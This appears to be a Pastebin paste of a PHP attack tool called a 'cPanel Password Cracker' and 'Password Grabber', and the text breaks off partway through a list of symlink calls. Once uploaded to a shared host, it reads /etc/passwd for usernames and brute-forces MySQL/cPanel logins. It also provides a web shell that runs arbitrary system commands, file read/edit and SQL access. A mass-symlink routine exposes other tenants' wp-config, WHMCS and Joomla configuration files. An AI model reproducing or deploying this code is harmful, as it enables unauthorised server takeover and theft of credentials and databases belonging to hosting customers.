Advertisement
Guest User

Cpanel cracker with automated username and passwors grabbing

a guest
Apr 3rd, 2016
110
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 50.20 KB | None | 0 0
  1. <html>
  2. <title>cPanel Password Cracker</title>
  3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  4. <?php
  5.  
  6. echo '<head>
  7.  
  8. <style type="text/css">
  9. <!--
  10. body {
  11.     background-color: #000000;
  12.    font-size: 18px;
  13.     color: #cccccc;
  14. }
  15. input,textarea,select{
  16. font-weight: bold;
  17. color: #cccccc;
  18. dashed #ffffff;
  19. border: 1px
  20. solid #2C2C2C;
  21. background-color: #080808
  22. }
  23. a {
  24.     background-color: #151515;
  25.     vertical-align: bottom;
  26.     color: #000;
  27.     text-decoration: none;
  28.     font-size: 20px;
  29.     margin: 8px;
  30.     padding: 6px;
  31.     border: thin solid #000;
  32. }
  33. a:hover {
  34.     background-color: #080808;
  35.     vertical-align: bottom;
  36.     color: #333;
  37.     text-decoration: none;
  38.     font-size: 20px;
  39.     margin: 8px;
  40.     padding: 6px;
  41.     border: thin solid #000;
  42. }
  43. .style1 {
  44.     text-align: center;
  45. }
  46. .style2 {
  47.     color: #FFFFFF;
  48.     font-weight: bold;
  49. }
  50. .style3 {
  51.     color: #FFFFFF;
  52. }
  53. -->
  54. </style>
  55.  
  56. </head>
  57. ';
  58.  
  59. @set_time_limit(0);
  60. @error_reporting(0);
  61.  
  62. function in($type,$name,$size,$value,$checked=0)
  63.  {
  64.  $ret = "<input type=".$type." name=".$name." "; if($size != 0)
  65.  {
  66.  $ret .= "size=".$size." "; }
  67.  $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
  68.  
  69. class my_sql
  70.  {
  71.  var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect()
  72.  {
  73.  switch($this->db)
  74.  {
  75.  case 'MySQL': if(empty($this->port))
  76.  {
  77.  $this->port = '3306'; }
  78.  if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port))
  79.  {
  80.  $this->port = '1433'; }
  81.  if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port))
  82.  {
  83.  $this->port = '5432'; }
  84.  $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
  85.  return 0; }
  86.  function select_db()
  87.  {
  88.  switch($this->db)
  89.  {
  90.  case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
  91.  return 0; }
  92.  function query($query)
  93.  {
  94.  $this->res=$this->error=''; switch($this->db)
  95.  {
  96.  case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  97.  {
  98.  $this->error = @mysql_error($this->connection); return 0; }
  99.  else if(is_resource($this->res))
  100.  {
  101.  return 1; }
  102.  return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection)))
  103.  {
  104.  $this->error = 'Query error'; return 0; }
  105.  else if(@mssql_num_rows($this->res) > 0)
  106.  {
  107.  return 1; }
  108.  return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query)))
  109.  {
  110.  $this->error = @pg_last_error($this->connection); return 0; }
  111.  else if(@pg_num_rows($this->res) > 0)
  112.  {
  113.  return 1; }
  114.  return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query)))
  115.  {
  116.  $this->error = 'Query parse error'; }
  117.  else
  118.  {
  119.  if(@ociexecute($this->res))
  120.  {
  121.  if(@ocirowcount($this->res) != 0) return 2; return 1; }
  122.  $error = @ocierror(); $this->error=$error['message']; }
  123.  break; }
  124.  return 0; }
  125.  function get_result()
  126.  {
  127.  $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db)
  128.  {
  129.  case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
  130.  {
  131. $this->columns = @array_keys($this->rows[0]); return 1;}
  132.  break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
  133.  {
  134. $this->columns = @array_keys($this->rows[0]); return 1;}
  135. ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
  136.  {
  137. $this->columns = @array_keys($this->rows[0]); return 1;}
  138.  break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
  139.  {
  140. $this->columns = @array_keys($this->rows[0]); return 1;}
  141.  break; }
  142.  return 0; }
  143.  function dump($table)
  144.  {
  145.  if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '##    Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db)
  146.  {
  147.  case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  148.  {
  149.  foreach($this->rows[$i] as $k=>$v)
  150.  {
  151. $this->rows[$i][$k] = @mysql_real_escape_string($v);}
  152.  $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  153.  break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  154.  {
  155.  foreach($this->rows[$i] as $k=>$v)
  156.  {
  157. $this->rows[$i][$k] = @addslashes($v);}
  158.  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  159.  break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  160.  {
  161.  foreach($this->rows[$i] as $k=>$v)
  162.  {
  163. $this->rows[$i][$k] = @addslashes($v);}
  164.  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  165.  break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
  166.  return 1; }
  167.  function close()
  168.  {
  169.  switch($this->db)
  170.  {
  171.  case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
  172.  }
  173.  function affected_rows()
  174.  {
  175.  switch($this->db)
  176.  {
  177.  case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
  178.  }
  179.  }
  180.  if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name']))
  181.  {
  182.  if(!$file=@fopen($_POST['d_name'],"r"))
  183.  {
  184.  err(1,$_POST['d_name']); $_POST['cccc']=""; }
  185.  else
  186.  {
  187.  @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
  188.  {
  189.  header('Content-Encoding: ' . $content_encoding); }
  190.  header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
  191.  }
  192.  if(isset($_GET['phpinfo']))
  193.  {
  194.  echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  195.  if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
  196.  {
  197.  echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  198.  {
  199.  if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  200.  {
  201.  foreach($querys as $num=>$query)
  202.  {
  203.  if(strlen($query)>5)
  204.  {
  205.  echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
  206.  {
  207.  case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result())
  208.  {
  209.  echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
  210.  {
  211.  foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
  212.  echo "</table>"; }
  213.  break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
  214.  }
  215.  }
  216.  }
  217.  }
  218.  echo "<br><title>Cpanel Cracker by</title><form name=form method=POST>";
  219.  echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query');
  220.  echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  221.  
  222. function ccmmdd($ccmmdd2,$att)
  223. {
  224. global $ccmmdd2,$att;
  225. echo '
  226. <table style="width: 100%" class="style1" dir="rtl">
  227.     <tr>
  228.         <td class="style9"><strong>���� ������</strong></td>
  229.     </tr>
  230.     <tr>
  231.         <td class="style13">
  232.                 <form method="post">
  233.                     <select name="att" dir="rtl" style="height: 109px" size="6">
  234. ';
  235. if($_POST['att']==null)
  236. {
  237. echo '                      <option value="system" selected="">system</option>';
  238. }else{
  239. echo "                      <option value='$_POST[att]' selected=''>$_POST[att]</option>
  240.                         <option value=system>system</option>
  241. ";
  242.  
  243.                        
  244. }
  245.  
  246. echo '
  247.                         <option value="passthru">passthru</option>
  248.                         <option value="exec">exec</option>
  249.                         <option value="shell_exec">shell_exec</option> 
  250.                     </select>
  251.                         <input name="page" value="ccmmdd" type="hidden"><br>
  252.                         <input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
  253.                         <input type="submit" value="�����">
  254.                 </form>
  255.        
  256.         </td>
  257.     </tr>
  258.     <tr>
  259.         <td class="style13">
  260. ';
  261.  
  262.         if($_POST[att]=='system')
  263.         {
  264. echo '
  265.                     <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  266.                     system($_POST['ccmmdd2']);
  267. echo '                  </textarea>';
  268.  
  269.  
  270.         }
  271.  
  272.         if($_POST[att]=='passthru')
  273.         {
  274. echo '
  275.                     <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  276.                     passthru($_POST['ccmmdd2']);
  277. echo '                  </textarea>';
  278.  
  279.  
  280.         }
  281.  
  282.        
  283.  
  284.  
  285.  
  286.         if($_POST[att]=='exec')
  287.         {
  288.  
  289. echo '                  <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  290.                     exec($_POST['ccmmdd2'],$res);
  291.                 echo $res = join("\n",$res);               
  292. echo '                  </textarea>';
  293.  
  294.  
  295.         }
  296.  
  297.  
  298.  
  299.  
  300.  
  301.  
  302.  
  303.         if($_POST[att]=='shell_exec')
  304.         {
  305.  
  306. echo '                  <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  307.                 echo    shell_exec($_POST['ccmmdd2']);
  308. echo '                  </textarea>';
  309.  
  310.  
  311.         }
  312. echo '     
  313.         </td>
  314.     </tr>
  315. </table>
  316. ';
  317.  
  318. exit;
  319. }
  320.  
  321. if($_POST['page']=='edit')
  322. {
  323.  
  324. $code=@str_replace("\r\n","\n",$_POST['code']);
  325. $code=@str_replace('\\','',$code);
  326. $fp = fopen($pathclass, 'w');
  327. fwrite($fp,"$code");
  328. fclose($fp);
  329. echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  330. exit;
  331. }  
  332.  
  333.  
  334.  
  335.  
  336.  
  337.  
  338.  
  339.     if($_POST['page']=='show')
  340.     {
  341.     $pathclass =$_POST['pathclass'];
  342. echo '
  343. <form method="POST">
  344. <input type="hidden" name="page" value="edit">
  345. ';
  346.    
  347.     $sahacker = fopen($pathclass, "rb");
  348. echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">'; 
  349. $code = fread($sahacker, filesize($pathclass));
  350. echo $code =htmlspecialchars($code);
  351. echo '</textarea>';
  352.     fclose($sahacker);
  353. echo '
  354. <br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
  355. <br><strong><input type="submit" value="edit file">
  356. </form>
  357. ';
  358.         exit;
  359.     }
  360.  
  361.  
  362.  
  363.  
  364.     if($_POST['page']=='ccmmdd')
  365.     {
  366.     echo ccmmdd($ccmmdd2,$att);
  367.     exit;
  368.     }
  369.  
  370.  
  371.  
  372.  
  373.  
  374.  
  375.  
  376.  
  377.  
  378.  
  379.  
  380.  
  381.  
  382.  
  383.  
  384.  
  385.  
  386.  
  387.  
  388.  
  389.  
  390.  
  391.  
  392.  
  393. if($_POST['page']=='find')
  394. {
  395. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  396. {
  397.     if($_POST['type'] == 'passwd'){
  398.         $e = explode("\n",$_POST['usernames']);
  399.         foreach($e as $value){
  400.         $k = explode(":",$value);
  401.         $username .= $k['0']." ";
  402.         }
  403.     }elseif($_POST['type'] == 'simple'){
  404.         $username = str_replace("\n",' ',$_POST['usernames']);
  405.     }
  406.     $a1 = explode(" ",$username);
  407.     $a2 = explode("\n",$_POST['passwords']);
  408.     $id2 = count($a2);
  409.     $ok = 0;
  410.     foreach($a1 as $user )
  411.     {
  412.         if($user !== '')
  413.         {
  414.         $user=trim($user);
  415.          for($i=0;$i<=$id2;$i++)
  416.          {
  417.             $pass = trim($a2[$i]);
  418.             if(@mysql_connect('localhost',$user,$pass))
  419.             {
  420.                 echo "cPanel~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
  421.                 $ok++;
  422.             }
  423.          }
  424.         }
  425.     }
  426.     echo "<hr><b>You Found <font color=green>$ok</font> Cpanel(s)</b>";
  427.     echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  428.     exit;
  429. }
  430. }
  431. ?>
  432.  
  433.  
  434.  
  435.  
  436. <form method="POST" target="_blank">
  437.     <strong>
  438. <input name="page" type="hidden" value="find">                     
  439.     </strong>
  440.     <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
  441.     <tr>
  442.         <td valign="top" bgcolor="#151515"><center><strong><br>
  443.         </strong>
  444.         <a target="_blank" href="http://www.google.com" class="style2"><strong>cPanel Cracker + Password Grabber</strong></a></center></td>
  445.     </tr>
  446.     <tr>
  447.     <td>
  448.     <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  449.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  450.     <strong>User :</strong></td>
  451.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames">
  452. <?php $users=file("/etc/passwd");
  453. foreach($users as $user)
  454. {
  455. $str=explode(":",$user);
  456. echo $str[0]."\n";
  457. }
  458.  
  459. ?>
  460. </textarea></strong></td>
  461.     </tr>
  462.     <tr>
  463.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  464.     <strong>Pass :</strong></td>
  465.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords">
  466. <?php
  467.  
  468. $d=getcwd()."/r.txt";
  469. $pf=file($d);
  470. foreach($pf as $rt)
  471. {
  472. $str=explode('\n',$rt);
  473. echo trim($str[0])."\n";
  474. } ?>
  475. </textarea></strong></td>
  476.     </tr>
  477.     <tr>
  478.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  479.     <strong>Type :</strong></td>
  480.     <td valign="top" bgcolor="#151515" colspan="5">
  481.     <span class="style2"><strong>Simple : </strong> </span>
  482.     <strong>
  483.     <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  484.     <font class="style2"><strong>/etc/passwd : </strong> </font>
  485.     <strong>
  486.     <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  487.     </strong>
  488.     </span>
  489.     </td>
  490.     </tr>
  491.     <tr>
  492.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  493.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start">
  494.     </strong>
  495.     </td>
  496.     <tr>
  497. </form>    
  498.    
  499.     <td valign="top" colspan="6"><strong></strong></td>
  500.  
  501. <form method="POST" target="_blank">
  502. <strong>
  503. <input type="hidden" name="go" value="cmd_mysql">
  504.         </strong>
  505.         <tr>
  506.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td>
  507.                     </tr>
  508.         <tr>
  509.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td>
  510.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td>
  511.     <td valign="top" bgcolor="#151515"><strong>pass</strong></td>
  512.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td>
  513.     <td valign="top" bgcolor="#151515"><strong>database</strong></td>
  514.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td>
  515.                     </tr>
  516.                     <tr>
  517.     <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;">
  518.     <strong>cmd ~</strong></td>
  519.     <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
  520.     <strong>
  521.     <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
  522. SHOW TABLES user_vb ;
  523. SELECT * FROM user;
  524. SELECT version();
  525. SELECT user();</textarea></strong></td>
  526.         </tr>
  527.         <tr>
  528.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  529.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
  530.         </tr>
  531. <input name="db" value="MySQL" type="hidden">
  532. <input name="db_server" type="hidden" value="localhost">
  533. <input name="db_port" type="hidden" value="3306">
  534. <input name="cccc" type="hidden" value="db_query">
  535.        
  536. </form>    
  537.         <tr>
  538.     <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td>
  539.  
  540.  
  541.         </tr>
  542.        
  543. <form method="POST" target="_blank">
  544.         <tr>
  545.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD
  546.     system - passthru - exec - shell_exec</strong></td>
  547.                     </tr>
  548.         <tr>
  549.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td>
  550.     <td valign="top" bgcolor="#151515" colspan="5">
  551.                     <select name="att" dir="rtl"  size="1">
  552. <?php
  553. if($_POST['att']==null)
  554. {
  555. echo '                      <option value="system" selected="">system</option>';
  556. }else{
  557. echo "                      <option value='$_POST[att]' selected=''>$_POST[att]</option>
  558.                         <option value=system>system</option>
  559. ";
  560.  
  561.                        
  562. }
  563. ?>
  564.  
  565.                         <option value="passthru">passthru</option>
  566.                         <option value="exec">exec</option>
  567.                         <option value="shell_exec">shell_exec</option>
  568.                     </select>    
  569.     <strong>
  570. <input name="page" type="hidden" value="ccmmdd">    
  571.     <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
  572.         </tr>
  573.         <tr>
  574.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  575.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td>
  576.         </tr>
  577. </form>            
  578.  
  579. <form method="POST" target="_blank">
  580.  
  581.         <tr>
  582.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show
  583.     File And Edit</strong></td>
  584.                     </tr>
  585.         <tr>
  586.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
  587.     <td valign="top" bgcolor="#151515" colspan="5">
  588.     <strong>
  589.     <input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath('')?>"></strong></td>
  590.         </tr>
  591.         <tr>
  592.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  593.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
  594.                     </tr>
  595. <input name="page" type="hidden" value="show">                     
  596. </form>                
  597.                     <tr>
  598.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
  599.     Security</strong></td>
  600.                     </tr>
  601.         <tr>
  602.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
  603.     <td valign="top" bgcolor="#151515" colspan="5">
  604.     <strong>
  605. <?php
  606. $safe_mode = ini_get('safe_mode');
  607. if($safe_mode=='1')
  608. {
  609. echo 'ON';
  610. }else{
  611. echo 'OFF';
  612. }
  613.  
  614. ?> 
  615.     </strong>  
  616.     </td>
  617.                     </tr>
  618.     <tr>
  619.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Function</strong></td>
  620.     <td valign="top" bgcolor="#151515" colspan="5">
  621.     <strong>
  622. <?php
  623. if(''==($func=@ini_get('disable_functions')))
  624. {
  625. echo "<font color=#00800F>No Security for Function</font></b>";
  626. }else{
  627. echo "<font color=red>$func</font></b>";
  628. }
  629. ?></strong></td>
  630.     <tr>
  631.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  632.     <td valign="top" bgcolor="#151515" colspan="5"><strong></strong></td>
  633.     </table>
  634.     </td>
  635.     </tr>
  636.     </table>
  637.    
  638. <center>    <p><font color=red size=6 face=\"comic sans ms\">\\\\\\\\\\\\\\\\\\\\\\\\ Configures And Password Grabber ///////////////////////</font>
  639. <?php
  640. ///////////////////////////////
  641. ///// Mass Symlink By  ////////
  642. ///////////////////////////////
  643. ?>
  644. <form method=post>
  645. <input type=submit name="usre" value="Click To Extract UserNames And Mass Symlink" /></form>
  646.  
  647.  
  648.  
  649.  
  650. <?php
  651. if(isset($_POST['usre'])){
  652. ?><form method=post>
  653. <textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
  654. foreach($users as $user)
  655. {
  656. $str=explode(":",$user);
  657. echo $str[0]."\n";
  658. }
  659.  
  660. ?></textarea><br><br>
  661. <input type=submit name=su value="Done ! ^_^ .. Now Click Hear To Symlink" /></form>
  662. <?php } ?>
  663. <?php
  664. error_reporting(0);
  665. echo "<font color=red size=2 face=\"comic sans ms\">";
  666. if(isset($_POST['su']))
  667. {
  668.  
  669. $dir=mkdir('symlink',0777);
  670. $r = " Options all \n DirectoryIndex symlink.html \n Require None \n Satisfy Any";
  671. $f = fopen('symlink/.htaccess','w');
  672.  
  673. fwrite($f,$r);
  674. $consym="<br><a target=_blank href=symlink/><font color=white size=3 face=\"comic sans ms\">Click To Go On Configuration Files</font></a>";
  675. echo "<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  676.  
  677. $usr=explode("\n",$_POST['user']);
  678.  
  679. foreach($usr as $uss )
  680. {
  681. $us=trim($uss);
  682.  
  683. $r="symlink/";
  684. symlink('/home/'.$us.'/include/configure.php',$r.$us.'..Unknown');
  685. symlink('/home/'.$us.'/public_html/include/configure.php',$r.$us.'..Unknown');
  686. symlink('/home/'.$us.'/include/config.php',$r.$us.'..Unknown');
  687. symlink('/home/'.$us.'/public_html/include/config.php',$r.$us.'..Unknown');
  688. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  689. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  690. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  691. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  692. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  693. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  694. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  695. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  696. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  697. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
  698. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  699. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  700. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  701. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  702. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  703. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  704. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  705. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  706. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  707. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  708. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  709. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  710. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  711. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  712. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  713. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  714. symlink('/home/'.$us.'/wp-config.php',$r.$us.'..WordPress');
  715. symlink('/home/'.$us.'/blog/wp-config.php',$r.$us.'..WordPress');
  716. symlink('/home/'.$us.'/wp/wp-config.php',$r.$us.'..WordPress');
